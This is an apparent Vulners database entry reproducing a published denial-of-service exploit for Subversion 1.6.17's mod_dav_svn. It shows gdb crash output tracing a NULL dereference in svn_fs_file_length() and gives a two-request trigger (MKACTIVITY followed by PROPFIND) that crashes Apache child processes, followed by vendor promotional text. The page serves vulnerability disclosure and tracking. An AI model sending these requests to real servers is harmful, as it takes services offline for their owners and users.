Vulners
Lucene search
Subversion 1.6.17 Denial Of Service
`#########################
# Subversion MKACTIVITY #
#########################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################
# libsvn_fs's svn_fs_file_length() fun
# tested on 1.6.17 and few others
(gdb) where
#0 0x00007f2595db9d60 in svn_fs_file_length () from /usr/lib/x86_64-linux-gnu/libsvn_fs-1.so.1
#1 0x00007f25961f2d8b in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#2 0x00007f25961f37c5 in dav_svn__insert_all_liveprops () from /usr/lib/apache2/modules/mod_dav_svn.so
#3 0x00007f259682b37a in dav_run_insert_all_liveprops (r=0x7f2590df10a0, resource=0x7fff6e97e1a8, what=DAV_PROP_INSERT_VALUE, phdr=0x7fff6e97dff0) at mod_dav.c:4889
#4 0x00007f259682bc55 in dav_get_allprops (propdb=0x7f258d0db3d0, what=DAV_PROP_INSERT_VALUE) at props.c:655
#5 0x00007f2596824f5e in dav_propfind_walker (wres=0x7fff6e97e188, calltype=<optimized out>) at mod_dav.c:1949
#6 0x00007f25961fc6d1 in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#7 0x00007f25961fcb6d in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#8 0x00007f2596829bda in dav_method_propfind (r=0x7f2590df10a0) at mod_dav.c:2081
#9 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4681
#10 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4587
#11 0x00007f259e568b50 in ap_run_handler (r=0x7f2590df10a0) at config.c:159
#12 0x00007f259e568f9b in ap_invoke_handler (r=r@entry=0x7f2590df10a0) at config.c:377
#13 0x00007f259e579078 in ap_process_request (r=r@entry=0x7f2590df10a0) at http_request.c:282
#14 0x00007f259e575f38 in ap_process_http_connection (c=0x7f25917c0290) at http_core.c:190
#15 0x00007f259e56f510 in ap_run_process_connection (c=0x7f25917c0290) at connection.c:43
#16 0x00007f259e56f8f8 in ap_process_connection (c=c@entry=0x7f25917c0290, csd=<optimized out>) at connection.c:190
#17 0x00007f259e57dc2e in child_main (child_num_arg=child_num_arg@entry=6) at prefork.c:667
#18 0x00007f259e57e382 in make_child (slot=6, s=0x7f259e4d6818) at prefork.c:768
#19 make_child (s=0x7f259e4d6818, slot=6) at prefork.c:696
#20 0x00007f259e57eee6 in perform_idle_server_maintenance (p=<optimized out>) at prefork.c:903
#21 ap_mpm_run (_pconf=_pconf@entry=0x7f259e515028, plog=<optimized out>, s=s@entry=0x7f259e4d6818) at prefork.c:1107
#22 0x00007f259e553826 in main (argc=3, argv=0x7fff6e97e9b8) at main.c:755
(gdb)
(gdb) i r
rax 0x7fff6e97e1e0 140735048835552
rbx 0x7fff6e97e1a8 140735048835496
rcx 0x7f2590df7028 139799321079848
rdx 0x0 0
rsi 0x0 0
rdi 0x7fff6e97dec8 140735048834760
rbp 0x3 0x3
rsp 0x7fff6e97de78 0x7fff6e97de78
r8 0x7f2596833ee0 139799415701216
r9 0x1 1
r10 0x1 1
r11 0x1 1
r12 0x4e24 20004
r13 0x7f2590e08028 139799321149480
r14 0x7fff6e97dff0 140735048835056
r15 0x7f2590df7028 139799321079848
rip 0x7f2595db9d60 0x7f2595db9d60 <svn_fs_file_length>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/i $rip
=> 0x7f2595db9d60 <svn_fs_file_length>: mov 0x30(%rsi),%rax
(gdb) x/x $rsi
0x0: Cannot access memory at address 0x0
Basically it requires >= 2 requests to crash apache child process (in mod_dav_svn / libsvn_fs).
-- cut --
1. MKACTIVITY /egg/!svn/act/foo HTTP/1.1
2. PROPFIND /egg/!svn/act/foo HTTP/1.1 (sigsegv)
-- cut --
EOF
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Mar 2013 00:00Current
0.4Low risk
Vulners AI Score0.4